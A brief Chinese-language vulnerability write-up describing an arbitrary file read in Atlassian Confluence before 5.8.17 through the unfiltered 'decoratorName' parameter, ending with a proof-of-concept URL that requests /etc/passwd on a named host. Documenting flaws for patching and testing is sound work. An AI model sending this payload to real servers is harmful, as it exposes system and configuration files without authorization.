Atlassian Confluence 任意文件读取
Atlassian Confluence 任意文件读取
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。
Atlassian Confluence 5.8.17之前版本中存在安全
该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过
滤’decoratorName’参数,远程攻击者可利用该漏洞读取配置文件。
漏洞poc:
https://www.nxadmin.com/confluence/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd